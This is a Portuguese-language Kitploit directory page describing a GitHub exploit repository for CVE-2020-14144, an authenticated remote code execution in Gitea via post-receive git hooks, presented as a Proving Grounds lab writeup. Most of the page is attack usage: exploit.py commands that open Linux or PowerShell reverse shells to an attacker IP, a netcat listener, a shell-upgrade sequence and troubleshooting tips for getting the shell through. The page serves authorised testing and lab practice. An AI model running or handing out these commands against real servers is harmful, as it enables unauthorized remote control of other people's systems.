Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Gitea-Git-Hooks-RCE-CVE-2020-14144- — As versões 1.1.0 → 1.12.5 do Gitea permitem que utilizadores autenticados com permissão "Pode criar hooks git" injetem comandos arbitrários de shell em hooks pós-recebimento. Ao fazer push de um commit, o hook é acionado e o payload é executado no servidor. | Kitploit
Ferramentas/GitHubGitHub/mohnad-al-saif/gitea-git-hooks-rce-cve-2020-14144-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubmohnad-al-saif/gitea-git-hooks-rce-cve-2020-14144-

Gitea-Git-Hooks-RCE-CVE-2020-14144-

As versões 1.1.0 → 1.12.5 do Gitea permitem que utilizadores autenticados com permissão "Pode criar hooks git" injetem comandos arbitrários de shell em hooks pós-recebimento. Ao fazer push de um commit, o hook é acionado e o payload é executado no servidor.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 6 mesesAinda não revisado

Gitea Git Hooks RCE (CVE-2020-14144)

Prática OffsecProvingGrounds — Writeup e POC da Máquina Roquefort

Visão Geral

ItemDetalhe
MáquinaRoquefort (Prática Proving Grounds)
SOLinux
Versão do Gitea1.7.5
CVECVE-2020-14144
VetorRCE Autenticado via Git Hooks
Shell do Usuáriochloe

As versões do Gitea 1.1.0 → 1.12.5 permitem que usuários autenticados com permissão "Pode criar hooks git" injetem comandos arbitrários de shell nos hooks post-receive. Enviar um commit aciona o hook e executa o payload no servidor.

Início Rápido

Automatizado (Script Python)

root@kitploit:~
# Linux target — reverse shell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os linux

# Windows target — PowerShell reverse shell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os windows

Manual

Veja MANUAL.md para o guia de exploração passo a passo.

Estrutura do Repositório

root@kitploit:~
.
├── README.md          # Este arquivo
├── MANUAL.md          # Guia de exploração manual (Linux + Windows)
└── exploit.py         # Script de exploração automatizado

Requisitos

  • Python 3.6+
  • Biblioteca requests (pip install requests)
  • git instalado na máquina do atacante
  • Credenciais válidas do Gitea com permissões de hooks git

Uso

root@kitploit:~
usage: exploit.py [-h] -t TARGET -u USERNAME -p PASSWORD -I REV_IP -P REV_PORT
                  [--os {linux,windows}] [--repo REPO] [-f PAYLOAD_FILE] [-v]

Roquefort — Gitea Authenticated RCE via Git Hooks (CVE-2020-14144)

required arguments:
  -t, --target       Target Gitea URL (e.g. http://192.168.x.x:3000)
  -u, --username     Gitea username
  -p, --password     Gitea password
  -I, --rev-ip       Attacker listener IP
  -P, --rev-port     Attacker listener port

optional arguments:
  --os               Target OS: linux (default) or windows
  --repo             Repository name to create (default: exploit)
  -f, --payload-file Custom shell script payload file
  -v, --verbose      Verbose output

Exemplos

root@kitploit:~
# 1) Inicie o listener
nc -lvnp 4444

# 2) Execute o exploit (alvo Linux)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444

# 3) Execute o exploit (alvo Windows)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444 --os windows

# 4) Arquivo de payload personalizado
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444 -f payload.sh

Upgrade de Shell (Pós-Exploração)

Após obter a reverse shell:

root@kitploit:~
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z
stty raw -echo; fg

Solução de Problemas

Referências

  • CVE-2020-14144 — NVD
  • Gitea Issue #13058
  • p0dalirius Original POC

Aviso Legal

Esta ferramenta é destinada apenas a testes de penetração autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Use com responsabilidade.

Baixar ferramenta
ProblemaSolução
fatal: dubious ownershipClone a partir de ~ em vez de pastas compartilhadas, ou execute git config --global --add safe.directory '*'
Nenhuma conexão recebidaVerifique o IP do atacante, confira o firewall, confirme que ambas as máquinas estão na mesma sub-rede
Hook dispara mas sem shellTeste primeiro com o payload touch /tmp/pwned — se o arquivo aparecer, a reverse shell está sendo bloqueada
Permissão negada nos hooksO usuário não tem permissões de hook — precisa de privilégio de admin ou "Pode criar hooks git"
Conflito de porta na 3000O Gitea usa a 3000 — use uma porta diferente, como 4444, para seu listener